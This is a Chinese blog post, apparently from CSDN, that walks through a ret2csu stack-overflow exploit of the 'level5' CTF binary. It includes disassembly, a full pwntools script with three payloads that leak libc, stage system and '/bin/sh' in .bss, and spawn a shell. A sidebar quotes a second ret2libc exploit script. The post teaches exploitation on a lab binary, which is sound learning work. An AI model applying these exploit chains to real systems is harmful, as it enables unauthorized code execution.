pwn中级ROP——ret2csu

最新推荐文章于 2024-12-10 14:33:06 发布
原创 最新推荐文章于 2024-12-10 14:33:06 发布 · 1.5k 阅读 · 27 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#网络安全 #系统安全

本文详细解析了在64位程序环境中利用ret2csu技巧,尤其是__libc_csu_init函数来控制寄存器,实现函数参数的精确传递。涉及到了栈溢出漏洞分析、反汇编技术、计算偏移量以及payload构建。重点讨论了如何在有限条件下利用write和system函数进行权限提升的策略。

ret2csu

环境

ret2csu
在其中下载level5即可

原理

64位汇编语言函数传参

在一切开始之前,我们需要先了解一下64位汇编语言调用函数时是如何传参的,它与32位程序并不相同。

32位程序在调用函数时会将参数存入栈中

而64位程序在调用函数时,如果该函数参数少于7个,就会将参数从前往后依次存入rdi, rsi,rdx, rcx, r8, r9寄存器中。
如果该函数参数多于或等于7个,则前六个参数如上存放到寄存器中,剩余的参数会类似于32位程序存入栈中。

所以我们在利用64位程序栈溢出漏洞时,在调用函数之前需要将各个参数存入各个寄存器中才可顺利进行。那么我们该如何给这些寄存器赋值呢?按老样子用ROPgadgets来一个一个查找对应的pop指令吗?且不说能不能找到是个问题,就这样一个一个查找也未免过于麻烦。有没有一种简便的方法呢?

64位程序基本都有的一个函数__libc_csu_init可以帮我们解决这个问题。该函数有段这样的代码:

.text:0000000000400600 loc_400600:                             ; CODE XREF: __libc_csu_init+54j
.text:0000000000400600                 mov     rdx, r13
.text:0000000000400603                 mov     rsi, r14
.text:0000000000400606                 mov     edi, r15d
.text:0000000000400609                 call    qword ptr [r12+rbx*8]
.text:000000000040060D                 add     rbx, 1
.text:0000000000400611                 cmp     rbx, rbp
.text:0000000000400614                 jnz     short loc_400600
.text:0000000000400616
.text:0000000000400616 loc_400616:                             ; CODE XREF: __libc_csu_init+34j
.text:0000000000400616                 add     rsp, 8
.text:000000000040061A                 pop     rbx
.text:000000000040061B                 pop     rbp
.text:000000000040061C                 pop     r12
.text:000000000040061E                 pop     r13
.text:0000000000400620                 pop     r14
.text:0000000000400622                 pop     r15
.text:0000000000400624                 retn
.text:0000000000400624 __libc_csu_init endp

loc_400616中我们可以控制rbx,rbp,r12,r13,r14,r15(pop指令将栈顶弹入寄存器)
loc_400600中我们可以控制rdx,rsi,edi(间接通过r13,r14,r15来控制),而这里的rdx,rsi,edi正好是函数的前三个参数所需寄存器,不过edi只能控制函数的低32位,但也足以应付大部分函数

所以我们只需要先控制主函数返回到loc_400616,并在栈上从前往后构造每个寄存器想要赋予的值,然后在loc_400624对应的栈填上loc_400600,跳转到这一部分,通过刚才各寄存器构造的参数来给rdx,rsi,edi赋值,在loc_400609运行想要执行的函数,即可成功执行。

需要注意的是,如果我们还想在执行完这一函数后继续运行程序,就需要在loc_400611位置让rbxrbp相等,从而可以顺利执行到loc_400624返回到想要继续进行的函数。否则函数将跳到loc_400600循环执行这一部分。

漏洞分析

反汇编

这道题反汇编代码如下

ssize_t vulnerable_function()
{
  char buf[128]; // [rsp+0h] [rbp-80h] BYREF

  return read(0, buf, 0x200uLL);
}
int __cdecl main(int argc, const char **argv, const char **envp)
{
  write(1, "Hello, World\n", 0xDuLL);
  return vulnerable_function();
}

可以看到在vulnerable_function函数中人read函数存在栈溢出漏洞,在该函数执行之前又执行了一次write函数,且在IDA中函数栏存在_write,所以我们可以利用ELF直接获得write函数GOT表内容并在_write进行输出,获得其GOT值,从而依靠LibcSearcher找到libc的基址,进而找到system函数地址进行提权。(类似于ret2libc3

由于这是x64程序,我们在调用write函数时需要先将其三个参数依次放入rdi, rsi,rdx寄存器中,这时我们__libc_csu_init了。

我们在IDA中点开该函数看一下,相关代码如下

.text:00000000004005F0 loc_4005F0:                             ; CODE XREF: __libc_csu_init+64↓j
.text:00000000004005F0                 mov     rdx, r15
.text:00000000004005F3                 mov     rsi, r14
.text:00000000004005F6                 mov     edi, r13d
.text:00000000004005F9                 call    qword ptr [r12+rbx*8]
.text:00000000004005FD                 add     rbx, 1
.text:0000000000400601                 cmp     rbx, rbp
.text:0000000000400604                 jnz     short loc_4005F0
.text:0000000000400606
.text:0000000000400606 loc_400606:                             ; CODE XREF: __libc_csu_init+48↑j
.text:0000000000400606                 mov     rbx, [rsp+38h+var_30]
.text:000000000040060B                 mov     rbp, [rsp+38h+var_28]
.text:0000000000400610                 mov     r12, [rsp+38h+var_20]
.text:0000000000400615                 mov     r13, [rsp+38h+var_18]
.text:000000000040061A                 mov     r14, [rsp+38h+var_10]
.text:000000000040061F                 mov     r15, [rsp+38h+var_8]
.text:0000000000400624                 add     rsp, 38h
.text:0000000000400628                 retn

可以看到这里与上面原理处写得不太一样,区别就是下面的pop变成了mov,不过问题不大,只需要注意rsp的变化就可以,具体可以见payload

这道题我有两个问题

一个是我们在ret2libc3处可以直接利用libcsystemstr_bin_sh的地址构造payload,但这道题必须先将这两个放入bss段才能够进行调用

一个同样是在ret2libc3处我们是利用的str_bin_sh来作为参数传入system,但这道题我们只能直接用/bin/sh字符串作为参数

这两个问题我还没有搞清楚原因,如果有老哥可以解惑,感激不尽

计算偏移量

x64利用gdb计算偏移量时与x32有所不同
不同之处在于使用cyclic -l的地方,在我们r运行完并输入随机字符后,返回值如下
在这里插入图片描述
这时我们不能直接使用cyclic -l 0x6261616b6261616a来查找对应的位置,而需要使用

cyclic -l 0x6261616a

只能使用后四个字节来查找,如果使用前四个字节会使找到的偏移量多4

payload

# -*- coding: utf-8 -*-
from pwn import *
from LibcSearcher import *
#context.log_level="debug"

io = process('./level5')
elf = ELF('./level5')

write_got = p64(elf.got['write'])
start_addr = p64(elf.symbols['_start'])
gadget1_addr = p64(0x400606)
gadget2_addr = p64(0x4005F0)
payload = 'a' * 136 + gadget1_addr + p64(0) + p64(0) + p64(1) + write_got + p64(1) + write_got + p64(8) + gadget2_addr + 'a' * 56 + start_addr
io.recvuntil("Hello, World\n")
io.send(payload)
write_addr = u64(io.recv(8))
print('send 1')

libc = LibcSearcher("write",write_addr)
libcbase = write_addr - libc.dump("write")
sys_addr = libcbase + libc.dump("system")
bin_sh_addr = libcbase + libc.dump("str_bin_sh")

read_got = p64(elf.got['read'])
bss_addr = elf.bss()
payload2 = 'a' * 136 + gadget1_addr + p64(0) + p64(0) + p64(1) + read_got + p64(0) + p64(bss_addr) + p64(16) + gadget2_addr + 'a' * 56 + start_addr
io.recvuntil("Hello, World\n")
io.send(payload2)
io.send(p64(sys_addr) + '/bin/sh\00')
print('send 2')

payload3 ='a' * 136 + gadget1_addr + p64(0) + p64(0) + p64(1) + p64(bss_addr) + p64(bss_addr + 8) + p64(0) + p64(0) + gadget2_addr + 'a' * 56 + start_addr
io.recvuntil("Hello, World\n")
io.send(payload3)
print('send 3')

io.interactive()

payload1

地址栈中数据
return前a * 136
main函数return(rsp)0x400606(gadget1)
rsp + 80(填充数据)
rsp + 16(rbx)0
rsp + 24(rbp)1
rsp + 32(r12)write_got_addr
rsp + 40(r13)1
rsp + 48(r14)write_got_addr
rsp + 56(r15)8
gadget1的return0x4005F0(gadget2)
新rspa * 8(填充)
新一轮的movea * 48(填充)
gadget2的returnstart_addr

这里rsp+8处填充0是因为在main函数返回到gadget1处时,rsp会自增8,导致此时rsp + 8处才是真正的rsp位置,这里的rsp只是针对于return处的值。
同理,下面的新rsp也是这个道理。

新一轮的move的意思是,在return之前我没还要进行那六个寄存器的mov操作,也就是上面rsp + 16 ~ rsp + 56这一串操作,这里赋值什么都不影响,我们所要利用的就是return,所以全部随便填充即可。

return返回的地方是start,也就是整个程序开始的地方,方便进行下一步操作

要注意两点

第一点是rbx在这里必须赋值为0,因为我们调用函数时执行的是这一行

.text:00000000004005F9                 call    qword ptr [r12+rbx*8]

rbx为0时才能直接跳到r12处,在第一轮赋值时把r12赋值为想要执行的函数地址即可

第二点是rbx必须为rbp - 1,因为下面这几行

.text:00000000004005FD                 add     rbx, 1
.text:0000000000400601                 cmp     rbx, rbp
.text:0000000000400604                 jnz     short loc_4005F0

想要不循环下去就必须使rbx + 1=rbp

payload2

地址栈中数据
return前a * 136
main函数return(rsp)gadget1
rsp + 80
rsp + 160
rsp + 241
rsp + 32read_got_addr
rsp + 400
rsp + 48bss_addr
rsp + 5616
gadget1的returngadget2_addr
a * 56
gadget2的returnstart_addr

payload2payload1大同小异,就是将要执行的函数替换成了read函数,从而将libc中system函数与/bin/sh字符串放入.bss段中

payload3

地址栈中数据
return前a * 136
main函数return(rsp)gadget1
rsp + 80
rsp + 160
rsp + 241
rsp + 32bss_addr(system函数)
rsp + 40bss_addr + 8(/bin/sh字符串)
rsp + 480
rsp + 560
gadget1的returngadget2_addr
a * 56
gadget2的returnstart_addr

payload3同样与之前的payload没什么大区别,就是运行了system函数来提权。这里后面的填充与gadget2return其实写不写无所谓,因为我们运行到system函数就已经获得了我们想要的结果,后面程序怎么运行与我们无关。

PWN-中级ROP-[HNCTF 2022 WEEK2]ret2csu
Welcome To Myon'Blog !
06-06 1493
本文分析了64位程序中利用__libc_csu_init函数进行栈溢出攻击的技术。通过控制寄存器传递参数,结合ret2csu技术泄露write函数地址,最终实现ret2libc攻击。文章详细讲解了gadgets选择、参数传递方法和攻击流程,并提供了完整的攻击脚本(exp)。该技术在不直接获取system函数和/bin/sh字符串的情况下,成功获取了shell权限,最终得到了flag。
从o开始的pwn学习之ret2csu
jzc020121的博客
04-09 3729
ret2csu 前置知识 X64寄存器 我们知道,64位寄存器有RAX,RBX,RCX,RDX,RDI,RSI,RBP,RSP,R8,R9,R10,R11,R12,R13,R14,R15,而rdi,rsi,rdx,rcx,r8,r9便用来传递函数的前六个参数,如多于六个,便在放到栈里。 __libc_csu_init 一般的程序都会调用libc中的函数,而此函数便是来将libc初始化的,故此函数几乎是每一个程序所必备的。 gadget 我们在构造ROP链的时候,往往会用到能够给寄存器赋值的gadget,形如
ROP Emporium ret2csu
u014377094的博客
02-18 554
现在的ROP Emporium一共有8题,后几道题相比过去的题有了一些变化,国内的新wp也是非常难找,本篇基于ROP Emporium - Ret2csu (x64) - blog.r0kithax.comhttps://blog.r0kithax.com/ctf/infosec/2020/10/20/rop-emporium-ret2csu-x64.html 这位大佬的wp进行部分的解释。 打开ida,依旧是惯例的明显栈溢出的pwnme,ret2win中我们可以看到flag是加密后文件,key文件是.
PWN-ret2csu
recover517的博客
12-06 704
在x64中,如果遇到函数调用需要传入3个参数,分别依赖【rdi,rsi,rdx】三个寄存器,但通过ROPgadget无法找到相关的寄存器利用链,这时,我们就要开始考虑通过调用__libc_csu_init函数来实现传递3个参数的效果,这种实现方式,称为 ret2csu
ret2csu
T_Fire_of_Square的博客
03-03 940
大多时候我们难以找到每个寄存器对应的gadgets,但是当我们遇到wirte函数泄露的时候却必须要控制三个寄存器(64位首先存入数据的rdi,rsi,rdx),这时候,我们就可以利用 x64 下的 __libc_csu_init 中的 gadgets。也就是说,因为write打印的话,是先从栈的低地址打印,再打印高地址的内容,那么先打印0x20的数据,再打印0x8的数据就是栈的基地址,再减去0x118就获得 /bin/sh的地址。而我们所利用的是函数的两块区域。retn到我们需要溢出的函数地址。
ret2csu的利用
zhuo1358的博客
04-19 1050
64位的动态连接文件一般有一段万能的gadget,里面可以控制rbx,rbp,r12,r13,r14,r15以及rdx,rsi,edi的值,并且还可以call我们指定的地址。可以看到上面两端汇编几乎囊括了传参的寄存器,而且还有call指令以及retn,我们可以利用这两段gadget来传参和调用,因为我们要先调用下面一段来传参,所以我们认为下面一段为gadget1,上面一段为gadget2。上面在调用了gadget1后又填充了a*8,因为寄存器是用sp指针来传参的,所以rsp要正确指向寄存器。
pwn学习笔记(9)-中级ROP--ret2csu
qq_66013948的博客
08-09 612
​ 首先是64位文件的传参方式:前六个参数是从左到右放入寄存器:rdi、rsi、rdx、rcx、r8、r9,之后的通过栈传参。​ 比如:传参函数大于7个:h->(%esp)g->(%esp)call H​ 之后反汇编一下main函数和H函数的代码​ 很明显的就是前六个参数是寄存器传参,剩下两个就是栈传参。
wikiCTF-pwn-ret2csu
Oops-re的博客
10-20 575
在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,但是大多数时候,我们很难找到每一个寄存器对应的 gadgets。这时候,我们可以利用 x64 下的 __libc_csu_init 中的 gadgets。
信息安全领域ret2csu技术在pwn利用中的实践
最新发布
11-01
内容概要:本文详细介绍了“ret2csu”这一二进制漏洞利用技术,重点讲解如何利用ELF文件中的__libc_csu_init函数中的gadget构造ROP链,在无法直接控制多个寄存器的情况下实现对任意函数(如system、write)的调用。...
中级ROP
m0_49959202的博客
09-23 673
文章目录中级ROP1.原理1.1 ret2csu1.1.1 libc_csu_init展示1.1.2 可用gadget介绍1.1.3 组合使用gadget思路1.1.4 类似于libc_csu_init,其他可用的gadget1.1.5 利用libc_csu_init尾部偏移,控制其他寄存器1.2 ret2reg1.2.1 原理1.2.2 防御方法1.3 BROP1.3.1 概念1.3.2 攻击条件1.3.3 攻击原理1.3.3.1 栈溢出长度1.3.3.2 Stack Reading1.3.3.3 Bli
中级 rop
weixin_55885866的博客
05-18 139
第一步:利用write()输出write在内存中的地址。gadget是call qword ptr [r12+rbx*8],所以应该使用write.got的地址而不是write.plt的地址。并且为了返回到原程序中,重复利用buffer overflow的漏洞,我们需要继续覆盖栈上的数据,直到把返回值覆盖成目标函数的main函数为止。链接:https://www.jianshu.com/p/187798890345。商业转载请联系作者获得授权,非商业转载请注明出处。作者:Queen_耳又又。
PWN:[WEEK2]ret2csu
m0_53932372的博客
10-19 333
pwn
PWN-栈溢出之ret2csu
weixin_53394081的博客
04-23 514
PWN-栈溢出之ret2csu
pwn的一道题-- ezsyscall,题型是ret2csu+ret2syscall
2403_87031746的博客
12-10 995
(正常来说可以放read的got表的地址这样的话我们就可以直接调用一步read函数,但因为抹除了got表,所以我们需给寄存器赋值syscall)所以我们需要ROPgadget来给寄存器赋值(其实ROPgadget不能给rdx赋值,给rdx赋值需要进行ret2csu,这是后话)但是,不难看出,一旦csu之后,就没办法给rax赋值了,所以我们提前一步给rax赋值为59(execve的系统调用号)*X64程序中有限按照一下顺序使用rdi,rsi,rdx,r8,r9寄存器来传递参数,rax是系统调用号。
pwn学习-中级ROP-1
WocW的博客
03-03 1137
CTF-wiki-中级ROP实例复现 ret2csu libc_csu_init函数 ctf-wiki上的 .text:00000000004005C0 ; void _libc_csu_init(void) .text:00000000004005C0 public __libc_csu_init .text:00000000004005C0 __l...
栈溢出----中级ROP
qq_42192672的博客
10-21 718
学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/medium_rop/ 1.ret2__libc_csu_init 这个主要是争对64位的程序的,和32位的栈传参不同的是,在 64 位程序中,函数的前 6 个参数是通过寄存器传递的,最完美的情况,肯定是需要的寄存器可以通过ROPgadgets找到合适的,但是总有找...
pwn刷题num48----syscall + ret2csu
tbsqigongzi的博客
05-04 1155
BUUCTF-PWN-ciscn_2019_s_3 首先查保护–>看链接类型–>赋予程序可执行权限–>试运行 (这里为了省事,自己写了一个小shell脚本) 64位程序,小端序 开启部分RELRO-----got表可写 未开启canary保护-----存在栈溢出 开启NX保护-----堆栈不可执行 未开启PIE-----程序地址为真实地址 动态链接 ida一下看一下主函数 这里sys_read和sys_write读取的字符串大小都大于buf的大小,存在栈溢出 syscall 系统
栈溢出总结之中级ROP
weixin_45097188的博客
03-01 432
ret2csu 原理: (所谓 gadgets 就是以 ret 结尾的指令序列,通过这些指令序列,我们可以修改某些地址的内容,方便控制程序的执行流程。) 在64位程序中,函数的前6个参数是通过寄存器传递的,但是大多时候,我们很难找到每一个寄存器对应的gadgets。而这时我们就可以利用x64下的 __libc_csu_init中的gadgets。这个函数是用来对libc进行初始化操作的,而一般的程...
中级ROP之BROP
至臻求学,胸怀云月
02-25 3579
Blind ROP 基本介绍 于2014年提出,论文题目名为Hacking Blind,BROP是指在没有对应应用程序的源代码或者二进制文件的情况下,对程序进行攻击,劫持程序的执行流。 攻击条件 源程序必须存在栈溢出漏洞,以便于攻击者可以控制程序流程。 服务器端的进程在崩溃之后会重新启动,并且重新启动的进程的地址与先前的地址一样,目前nginx,mysql,apache,openssh等服务器应...
[HNCTF 2022 WEEK2]ret2csu
12-27
### HNCTF 2022 WEEK2 ret2csu Challenge Solution #### 利用ret2csu技术实现漏洞利用 在处理`HNCTF 2022 WEEK2`的`ret2csu`挑战时,目标是通过控制程序流来调用特定函数并最终执行任意命令。此方法依赖于对`.text`段内存在的gadget链的应用以及对动态链接过程的理解。 为了完成这一攻击向量,首先需要找到合适的gadgets用于操控寄存器状态,并且能够触发`__libc_csu_init()`函数内的逻辑路径,该部分代码负责初始化全局构造器数组,在某些情况下可用于间接调用其他库函数如`write()`或`read()`等[^4]。 具体来说: - 使用`pwndbg cyclic`工具生成模式字符串并向服务端发送以定位崩溃发生的确切位置;之后借助`pattern offset`确定偏移值以便后续操作。 - 构造payload时应考虑如何填充堆栈帧使得当返回至`__libc_csu_init`时能正确设置参数传递给想要调用的目标函数(比如`puts@plt`),进而泄漏出关键内存地址信息(例如`got.plt`表项)。这些数据对于计算实际加载基址至关重要,因为它们允许我们推断出整个共享对象映射范围的位置。 - 接下来就是准备第二个阶段的有效载荷——通常是一串精心设计过的字节序列,它会被解释成机器指令从而绕过保护机制达成目的。这里可以通过泄露得到的信息调整base指针指向所需功能入口处(像`system()`)再配合伪造参数列表达到远程代码执行的效果。 ```python from pwn import * context.arch = 'amd64' elf = ELF('./vuln') io = remote('target_ip', port) # 泄露 libc 地址 rop = ROP(elf) pop_rdi_ret = rop.find_gadget(['pop rdi', 'ret'])[0] puts_plt = elf.plt['puts'] puts_got = elf.got['puts'] payload_leak = flat({ offset: [ pop_rdi_ret, puts_got, puts_plt, main_function_address # 返回到main或其他安全地方继续运行 ] }) io.sendlineafter(prompt, payload_leak) leaked_puts = u64(io.recvuntil('\x7f')[-6:].ljust(8, b'\x00')) log.success(f'Leaked puts address: {hex(leaked_puts)}') # 计算 system 和 binsh 的真实地址 libc_base = leaked_puts - libc.symbols['puts'] system_addr = libc_base + libc.symbols['system'] bin_sh_str = next(libc.search(b'/bin/sh\x00')) + libc_base # 准备 final payload 执行 /bin/sh final_payload = flat({ offset: [ pop_rdi_ret, bin_sh_str, system_addr ] }) io.sendline(final_payload) io.interactive() ``` 上述脚本展示了如何构建一个完整的exploit流程,包括但不限于发现溢出点、获取必要的库版本细节、解析符号表条目直至最后成功获得shell访问权限[^2]。
评论 2
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值